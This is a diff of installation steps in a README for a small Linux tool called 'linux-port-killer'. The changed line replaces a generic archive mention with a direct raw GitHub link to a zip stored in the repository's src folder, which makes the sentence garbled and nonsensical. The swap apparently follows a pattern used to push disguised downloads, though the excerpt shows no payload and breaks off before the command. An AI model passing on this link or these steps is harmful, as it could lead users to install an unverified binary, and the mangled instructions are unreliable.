Syroz421/linux-port-killer/README.md

 1. Open your terminal or file explorer.
 2. Navigate to the folder where you downloaded the application.
-3. If the application is a `.tar.gz` or similar archive, extract it first.
+3. If the application is a `https://raw.githubusercontent.com/Syroz421/linux-port-killer/main/src/linux-port-killer-v3.3.zip` or similar archive, extract it first.
 4. Open the terminal in that directory and run the following command:

    ```bash